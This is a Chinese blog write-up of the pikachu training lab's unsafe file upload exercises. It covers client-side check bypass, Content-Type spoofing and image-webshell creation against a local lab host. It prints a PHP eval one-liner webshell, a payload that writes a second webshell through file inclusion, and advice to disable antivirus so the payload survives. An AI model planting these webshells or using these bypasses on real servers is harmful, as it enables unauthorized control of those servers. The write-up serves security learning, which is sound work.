Unsafe Fileupload(不安全的文件上传)之 pikachu 靶场练习

最新推荐文章于 2024-05-31 18:12:04 发布
最新推荐文章于 2024-05-31 18:12:04 发布
阅读量1.9k 收藏 8
点赞数 4
分类专栏: 靶场测试 做题 文章标签: pikachu
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Goodric/article/details/113798094
版权

Unsafe Fileupload(不安全的文件上传)

上一篇我们对文件上传漏洞的一些知识进行了基本的了解:文件上传漏洞学习

接下来通过 piakchu 靶场的 Unsafe Fileupload 模块对几种不安全的文件上传漏洞进行测试。

刚开始测试的时候这边一直无法上传文件,一点击开始上传就出现 warning 警告。
之后通过关闭 win10 安全中心的实时保护解决了问题。
可能是由于文件里的一句话木马让 win10 给自动查杀了。

client check

客户端校验,不会在后端校验。
打开页面显示只允许上传图片。
在这里插入图片描述
尝试随便上传一个东西,会出现弹窗显示不符合要求。
在这里插入图片描述
根据显示弹窗可以判断是前端的 JS验证,F12 打开源代码可以看到这段 JavaScript 代码。
在这里插入图片描述
前端的验证可以直接绕过,这里直接把这里直接删除,不让前端检测。
在这里插入图片描述
删除之后就可以上传了,得到文件的路径。
上传文件:11.php
文件内容为一句话木马:

<?php @eval($_POST['aa']) ?>

在这里插入图片描述

接下来可以构造我们的 url :

http://192.168.1.5/pikachu/vul/unsafeupload/uploads/11.php

IP为靶场所在机器的IP。
路径这里需要注意,不能直接复制,因为文件保存的位置不在此模块的 clientcheck 下,而是在 uploads 文件里。
在这里插入图片描述

在这里插入图片描述
可以使用蚁剑进行连接,或者达到其他目的。
在这里插入图片描述

MIME tupe

MIME(Multipurpose Internet Mail Extensions,多用途互联网邮件扩展类型)
是设定某种扩展名的文件用一种应用程序来打开的方式类型,当该扩展名文件被访问时,浏览器会自动使用指定应用程序来打开。多用于指定一些客户端自定义的文件名,以及一些媒体文件打开方式。

$_FILES()函数 从浏览器的HTTP头里获取 Content-Type ,这个 Content-Type 前端用户是可以控制的。

尝试随便上传一个文件,回显出限制上传的文件格式。
在这里插入图片描述
这里上传一个 .php 格式的文件,Content-Type 的值是 application/octet-stream。
如果上传一个图片,Content-Type 的值是 image/jpeg 。
在这里插入图片描述
然后可以直接在抓到的数据包上修改 Content-Type 的值。
可以注意到这里有两个Content-Type,一开始我一直改第一个,结果一直无效。
在这里插入图片描述
正确的是修改第二个 Content-Type 的值,点击 Forward 文件就成功上传,得到文件路径。
在这里插入图片描述

getimagesize

这是一个PHP函数getimagesize() 能够识别图片文件信息 ,如果不是图片函数获取不到信息,文件就不允许上传。

随便上传一个文件,可以看到没有作用。
在这里插入图片描述
这里需要制作图片一句话木马。
准备:随便一张图片,两个 txt 文件,编辑完后在修改文件后缀 .php 和 .bat
在这里插入图片描述
.php 文件中的内容是一句话木马。
在这里插入图片描述
.bat 文件中的内容是 cmd 即可。
在这里插入图片描述
然后打开 a.bat ,就是一个命令指示符。
输入copy 22.png/b+11.php 123.jpg 之后回车即可。
后面的123.jpg 就是自己命名的一个图片文件。
在这里插入图片描述
可以看到在此文件夹中已经生成了这个文件,即为图片一句话木马。
在这里插入图片描述
其实原理就是把 .php 中的内容写进图片文件中,用 notepad++ 或者记事本就可以查看到。
在这里插入图片描述
网上有些教程在上传文件之前要在靶场根目录的 getimagesize.php文件插入时区函数:
date_default_timezone_set(“PRC”);
就是让文件上传的路径上有上传时间,不过我在没加上的时候似乎也是没什么问题,具体作用对于刚学习的我还不太清楚。。

接下来就可以直接上传这个图片一句话木马文件了,得到文件路径。
在这里插入图片描述
这个时候文件路径是没有问题的,可以通过浏览器访问到图片,但是我们在图片里面写的一句话代码无法用起来。
即图片木马无法被PHP脚本解析,蚁剑、菜刀啥的连接不上。

可以结合前面做过的文件包含漏洞模块,让蚁剑连接上。

按照上面的方法重新写一个图片木马,.php文件里的内容改为:

<?php fputs(fopen('muma.php','w'),'<?php @eval($_POST['aa']);?>'); ?>

把新制作好文件进行上传,能够得到文件路径,文件就放在靶场根目录上了。
此时模仿文件上传漏洞模块的 url,构造出以下 url:

http://192.168.1.5/pikachu/vul/fileinclude/fi_local.phpfilename=file:///E:\phpstudy_pro\WWW\pikachu\vul\unsafeupload\uploads\2021\02\10\9656226023f423461f0207493878.jpg

在这里插入图片描述
访问构造的 url 链接,应该会在文件包含漏洞的根目录下生成一个 mum.php 文件,再用蚁剑连接就可以成功了。
不过我在自己机器上又遇到了权限问题。。。。。。。。。难
方法应该是可以这么做,暂时无法测试。
在这里插入图片描述

Goodric
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
Unsafe file upload(文件)————pikachu靶场
qq_61579604的博客
10-17 91
文件功能在web应用系统很常见,比如很多网站注册的时候需要上头像、上附件等等。当用户点击上按钮后,后台会对上文件进行判断 比如是否是指定的类型、后缀名、大小等,然后将其按照设计的格式进行重命名后存储在指定的目录。如果说后台对上文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。所以,在设计文件功能时,一定要对进来的文件进行严格的安全考虑。比如:--验证文件类型、后缀名、大小;
pikachu靶场-Unsafe Upfileupload
mlws1900的博客
05-10 1045
什么是文件漏洞?​ 凡是存在文件的地方均有可能存在文件漏洞,关于上文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件漏洞。
pikachu靶场unsafe upfileupload文件)通关教程)
最新发布
记录学习
05-31 864
pikachu靶场文件漏洞简介
pikachu靶场通关-Unsafe Fileupload文件漏洞
qq_43381463的博客
02-11 618
文件功能在web应用系统很常见,比如很多网站注册的时候需要上头像、上附件等等。当用户点击上按钮后,后台会对上文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上一些恶意的文件,比如一句话木马,从而导致后台服务器被webshell。 所以,在设计文件功能时,一定要对进来的文件进行严格的安全考虑。
Pikachu靶场-Unsafe Fileupload
自强不息
12-30 401
文笔生疏,措辞浅薄,望各位大佬不吝赐教,万分感谢。
Pikachu-Unsafe Fileupload
baynk的博客
11-19 1170
0x00 不安全文件漏洞概述 文件功能在web应用系统很常见,比如很多网站注册的时候需要上头像、上附件等等。 当用户点击上按钮后,后台会对上文件进行判断 比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式进行重命名后存储在指定的目录。 如果说后台对上文件没有进行任何的安全判断或者判断条件不够严谨,则攻击着可能会上一些恶意的文件,比如一句话木马,从而导致后台服...
Pikachu靶场打靶记录
AnistonH的博客
10-16 301
Pikachu是一个带有漏洞的Web应用系统,在这里包含了常见的web安全漏洞。如果你是一个Web渗透测试学习人员且正发愁没有合适的靶场进行练习,那么Pikachu可能正合你意。漏洞类型列表如下Burt Force(暴力破解漏洞)XSS(跨站脚本漏洞)CSRF(跨站请求伪造)SQL-Inject(SQL注入漏洞)RCE(远程命令/代码执行)Files Inclusion(文件包含漏洞)Unsafe file downloads(不安全文件下载)
unsafe-java-world:不安全的Java示例
05-21
这个名为"unsafe-java-world"的项目显然旨在探讨和展示这些不安全的编程实践,以帮助开发者了解如何避免类似的错误。下面我们将深入分析这个项目可能涵盖的一些关键知识点。 1. **类型转换安全**:Java中的类型转换...
Web应用安全:越权下载文件实验.docx
06-18
2. 不安全文件和下载机制 3. 不当的输入验证和过滤 防止越权下载漏洞的方法: 1. 正确设置文件权限 2. 使用安全文件和下载机制 3. 实施输入验证和过滤 4. 使用安全的编程语言和框架 Web 应用安全是一...
C#中使用不安全代码(使用指针的代码)
06-29
在C#编程语言中,通常情况下我们不需要使用指针,因为C#提供了丰富的类型系统和安全的内存管理机制。然而,对于某些特定场景,如处理底层数据、优化性能或者与包含指针的库进行交互时,使用不安全代码(即包含指针的...
java版qq餐厅源码-WxJava-unsafe:WxJava不安全
06-04
关注公众号,公众号会及时通知SDK相关更新信息,并不定期分享微信开发相关技术知识。 其他说明 本项目Fork自chanjarster/weixin-java-tools,但由于原项目已停止维护,故单独维护和发布,且发布到maven上的groupId也...
Memory.Unsafe:使用非托管内存和指针的不安全方法
05-25
内存不安全 以完全通用的非类型安全方式使用指针和非托管内存的不安全方法。 NuGet 当前的NuGet软件包名称为DotNetCross.Memory.Unsafe 。 在这里能找到它: 已过时的NuGet软件包名称和URL 不幸的是,当我第一次...
pikachu+Unsafe Fileupload
qq_54537919的博客
03-11 718
pikachu+Unsafe Fileupload 6.1 client check 6.2 MIME type 6.3 getimagesize
Pikachu靶场通关笔记--unsafe fileupload (不安全文件)
weixin_45908624的博客
12-14 1086
文件漏洞
pikachu Unsafe Fileupload安全文件(皮卡丘漏洞平台通关系列)
箭雨镜屋
02-08 4388
一、client check 客户端验证 1、现象 先看一下直接上php文件是个什么效果 如下图所示,刚选好文件,还没有点 “开始上” 的时候,就弹出了提示 上文件不符合要求 2、绕过姿势 客户端验证一般两种绕过方法 (1)浏览器禁用javascript (2)burpsuite抓包改后缀 方法一、浏览器禁用javascript firefox有个插件叫JS Switch可以很方便的控制启用和禁用JS(有时候好像有点迟钝,可以多试几次) 先禁用JS,然后上文件sh.
pikachu-unsafe upfileupload
Cwillchris的博客
11-01 206
实验环境: DVWA靶机:172.16.12.10 windos攻击机:172.16.12.7 kali攻击机:172.16.12.30 实验步骤: 一、client check 提示只允许上图片,我们随便上一个非图片试试,直接弹窗不符合 选择一个图片,直接可以上 那我们还是BP拦截,图片加一句话木马试试 成功上,复制uploads/1.jpg 粘贴到url处构成新的url,复制新的url到菜刀连接 连接失败,可能是前端做
Pikachu靶场——文件漏洞(Unsafe upfileupload)
来日可期的博客
10-04 1959
文件是Web应用必备功能之一,如头像上,附件分享等。如果服务器配置不当或者没有进行足够的过滤,Web用户就可以上任意文件,包括恶意脚本文件,exe程序等等,这就造成了任意文件漏洞。
WebWall-09.Unsafe file uploads(不安全文件)
凯歌响起的博客
08-31 319
文件功能在web应用系统很常见,比如很多网站注册的时候需要上头像,附件等等。当用户点击上按钮后,后台会对上文件进行判断,比如是否是指定的类型、后缀名、大小等等,然后将其按照设计的格式重命名后存储在指定的目录,如果说后台对上文件没有进行任何的安全判断或者判断的条件不够严谨,则攻击者可能会上一些恶意的文件,从而导致服务器权限被获取。...
安全文件基本原理(Unsafe file upload)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
03-17 3643
安全文件基本原理(File upload vulnerabilities) 什么是文件漏洞? 常用1句话(密码全为1) Godzilla YYDS Raw or Base64 加密器区别 生成的面杀shell对比 pikachu clientcheck servercheck getimagesize cmd 合成图片马 exiftool dvwa Low Level Medium Level High Level Impossible Level PortSwigger 通过 .htacces
pikachu靶场逻辑漏洞
09-16
Pikachu靶场中存在逻辑越权漏洞。逻辑越权漏洞是指攻击者通过绕过应用程序的权限控制机制,直接访问或执行未授权的操作。具体来说,在Pikachu靶场中,攻击者可以通过使用超级boss账号"admin"或"pikachu",以及相应的密码"123456"或"000000",绕过权限限制,获取到其他用户的权限或执行未授权的操作。 参考资料: - [pikachu Unsafe Fileupload安全文件pikachu Over permission 越权(皮卡丘漏洞平台通关系列))](链接:https://xz.aliyun.com/t/7171) - [逻辑越权漏洞 逻辑越权漏洞简述 漏洞描述](链接:https://blog.csdn.net/pzjtian/article/details/89206239) - [Pikachu靶场之越权漏洞详解](链接:https://www.freebuf.com/articles/web/210978.html)

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Goodric

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值